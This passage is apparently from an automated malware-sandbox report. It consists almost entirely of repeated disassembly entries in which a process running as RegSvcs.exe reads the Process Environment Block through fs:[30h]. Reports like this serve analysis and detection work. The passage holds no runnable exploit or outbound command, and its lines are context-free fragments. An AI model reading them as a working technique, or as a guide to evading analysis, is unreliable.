                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0535 mov eax, dword ptr fs:[00000030h]14_2_019D0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A94500 mov eax, dword ptr fs:[00000030h]14_2_01A94500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8550 mov eax, dword ptr fs:[00000030h]14_2_019C8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8550 mov eax, dword ptr fs:[00000030h]14_2_019C8550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F656A mov eax, dword ptr fs:[00000030h]14_2_019F656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F656A mov eax, dword ptr fs:[00000030h]14_2_019F656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F656A mov eax, dword ptr fs:[00000030h]14_2_019F656A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4A4B0 mov eax, dword ptr fs:[00000030h]14_2_01A4A4B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F44B0 mov ecx, dword ptr fs:[00000030h]14_2_019F44B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C64AB mov eax, dword ptr fs:[00000030h]14_2_019C64AB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A49A mov eax, dword ptr fs:[00000030h]14_2_01A7A49A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C04E5 mov ecx, dword ptr fs:[00000030h]14_2_019C04E5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A46420 mov eax, dword ptr fs:[00000030h]14_2_01A46420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8402 mov eax, dword ptr fs:[00000030h]14_2_019F8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8402 mov eax, dword ptr fs:[00000030h]14_2_019F8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8402 mov eax, dword ptr fs:[00000030h]14_2_019F8402
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA430 mov eax, dword ptr fs:[00000030h]14_2_019FA430
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE420 mov eax, dword ptr fs:[00000030h]14_2_019BE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE420 mov eax, dword ptr fs:[00000030h]14_2_019BE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BE420 mov eax, dword ptr fs:[00000030h]14_2_019BE420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019BC427 mov eax, dword ptr fs:[00000030h]14_2_019BC427
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E245A mov eax, dword ptr fs:[00000030h]14_2_019E245A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4C460 mov ecx, dword ptr fs:[00000030h]14_2_01A4C460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019B645D mov eax, dword ptr fs:[00000030h]14_2_019B645D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FE443 mov eax, dword ptr fs:[00000030h]14_2_019FE443
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EA470 mov eax, dword ptr fs:[00000030h]14_2_019EA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EA470 mov eax, dword ptr fs:[00000030h]14_2_019EA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019EA470 mov eax, dword ptr fs:[00000030h]14_2_019EA470
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A7A456 mov eax, dword ptr fs:[00000030h]14_2_01A7A456
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A747A0 mov eax, dword ptr fs:[00000030h]14_2_01A747A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A6678E mov eax, dword ptr fs:[00000030h]14_2_01A6678E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C07AF mov eax, dword ptr fs:[00000030h]14_2_019C07AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4E7E1 mov eax, dword ptr fs:[00000030h]14_2_01A4E7E1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019CC7C0 mov eax, dword ptr fs:[00000030h]14_2_019CC7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C47FB mov eax, dword ptr fs:[00000030h]14_2_019C47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C47FB mov eax, dword ptr fs:[00000030h]14_2_019C47FB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A407C3 mov eax, dword ptr fs:[00000030h]14_2_01A407C3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E27ED mov eax, dword ptr fs:[00000030h]14_2_019E27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E27ED mov eax, dword ptr fs:[00000030h]14_2_019E27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019E27ED mov eax, dword ptr fs:[00000030h]14_2_019E27ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0710 mov eax, dword ptr fs:[00000030h]14_2_019C0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F0710 mov eax, dword ptr fs:[00000030h]14_2_019F0710
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3C730 mov eax, dword ptr fs:[00000030h]14_2_01A3C730
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC700 mov eax, dword ptr fs:[00000030h]14_2_019FC700
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F273C mov eax, dword ptr fs:[00000030h]14_2_019F273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F273C mov ecx, dword ptr fs:[00000030h]14_2_019F273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F273C mov eax, dword ptr fs:[00000030h]14_2_019F273C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC720 mov eax, dword ptr fs:[00000030h]14_2_019FC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC720 mov eax, dword ptr fs:[00000030h]14_2_019FC720
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C0750 mov eax, dword ptr fs:[00000030h]14_2_019C0750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F674D mov esi, dword ptr fs:[00000030h]14_2_019F674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F674D mov eax, dword ptr fs:[00000030h]14_2_019F674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F674D mov eax, dword ptr fs:[00000030h]14_2_019F674D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C8770 mov eax, dword ptr fs:[00000030h]14_2_019C8770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D0770 mov eax, dword ptr fs:[00000030h]14_2_019D0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02750 mov eax, dword ptr fs:[00000030h]14_2_01A02750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02750 mov eax, dword ptr fs:[00000030h]14_2_01A02750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A44755 mov eax, dword ptr fs:[00000030h]14_2_01A44755
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A4E75D mov eax, dword ptr fs:[00000030h]14_2_01A4E75D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4690 mov eax, dword ptr fs:[00000030h]14_2_019C4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C4690 mov eax, dword ptr fs:[00000030h]14_2_019C4690
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F66B0 mov eax, dword ptr fs:[00000030h]14_2_019F66B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FC6A6 mov eax, dword ptr fs:[00000030h]14_2_019FC6A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E6F2 mov eax, dword ptr fs:[00000030h]14_2_01A3E6F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A406F1 mov eax, dword ptr fs:[00000030h]14_2_01A406F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A406F1 mov eax, dword ptr fs:[00000030h]14_2_01A406F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA6C7 mov ebx, dword ptr fs:[00000030h]14_2_019FA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA6C7 mov eax, dword ptr fs:[00000030h]14_2_019FA6C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D260B mov eax, dword ptr fs:[00000030h]14_2_019D260B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A3E609 mov eax, dword ptr fs:[00000030h]14_2_01A3E609
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C262C mov eax, dword ptr fs:[00000030h]14_2_019C262C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A02619 mov eax, dword ptr fs:[00000030h]14_2_01A02619
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DE627 mov eax, dword ptr fs:[00000030h]14_2_019DE627
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F6620 mov eax, dword ptr fs:[00000030h]14_2_019F6620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F8620 mov eax, dword ptr fs:[00000030h]14_2_019F8620
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8866E mov eax, dword ptr fs:[00000030h]14_2_01A8866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A8866E mov eax, dword ptr fs:[00000030h]14_2_01A8866E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019DC640 mov eax, dword ptr fs:[00000030h]14_2_019DC640
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019F2674 mov eax, dword ptr fs:[00000030h]14_2_019F2674
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA660 mov eax, dword ptr fs:[00000030h]14_2_019FA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019FA660 mov eax, dword ptr fs:[00000030h]14_2_019FA660
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A489B3 mov esi, dword ptr fs:[00000030h]14_2_01A489B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A489B3 mov eax, dword ptr fs:[00000030h]14_2_01A489B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_01A489B3 mov eax, dword ptr fs:[00000030h]14_2_01A489B3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C09AD mov eax, dword ptr fs:[00000030h]14_2_019C09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019C09AD mov eax, dword ptr fs:[00000030h]14_2_019C09AD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h]14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019D29A0 mov eax, dword ptr fs:[00000030h] 14_2_019D29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4E9E0 mov eax, dword ptr fs:[00000030h] 14_2_01A4E9E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h] 14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h] 14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h] 14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h] 14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h] 14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019CA9D0 mov eax, dword ptr fs:[00000030h] 14_2_019CA9D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019F49D0 mov eax, dword ptr fs:[00000030h] 14_2_019F49D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A569C0 mov eax, dword ptr fs:[00000030h] 14_2_01A569C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019F29F9 mov eax, dword ptr fs:[00000030h] 14_2_019F29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019F29F9 mov eax, dword ptr fs:[00000030h] 14_2_019F29F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A8A9D3 mov eax, dword ptr fs:[00000030h] 14_2_01A8A9D3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019B8918 mov eax, dword ptr fs:[00000030h] 14_2_019B8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019B8918 mov eax, dword ptr fs:[00000030h] 14_2_019B8918
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4892A mov eax, dword ptr fs:[00000030h] 14_2_01A4892A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A5892B mov eax, dword ptr fs:[00000030h] 14_2_01A5892B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3E908 mov eax, dword ptr fs:[00000030h] 14_2_01A3E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A3E908 mov eax, dword ptr fs:[00000030h] 14_2_01A3E908
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4C912 mov eax, dword ptr fs:[00000030h] 14_2_01A4C912
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A0096E mov eax, dword ptr fs:[00000030h] 14_2_01A0096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A0096E mov edx, dword ptr fs:[00000030h] 14_2_01A0096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A0096E mov eax, dword ptr fs:[00000030h] 14_2_01A0096E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4C97C mov eax, dword ptr fs:[00000030h] 14_2_01A4C97C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A64978 mov eax, dword ptr fs:[00000030h] 14_2_01A64978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A64978 mov eax, dword ptr fs:[00000030h] 14_2_01A64978
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A40946 mov eax, dword ptr fs:[00000030h] 14_2_01A40946
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A94940 mov eax, dword ptr fs:[00000030h] 14_2_01A94940
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E6962 mov eax, dword ptr fs:[00000030h] 14_2_019E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E6962 mov eax, dword ptr fs:[00000030h] 14_2_019E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019E6962 mov eax, dword ptr fs:[00000030h] 14_2_019E6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019C0887 mov eax, dword ptr fs:[00000030h] 14_2_019C0887
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A4C89D mov eax, dword ptr fs:[00000030h] 14_2_01A4C89D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_01A8A8E4 mov eax, dword ptr fs:[00000030h] 14_2_01A8A8E4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019EE8C0 mov eax, dword ptr fs:[00000030h] 14_2_019EE8C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe Code function: 14_2_019FC8F9 mov eax, dword ptr fs:[00000030h] 14_2_019FC8F9
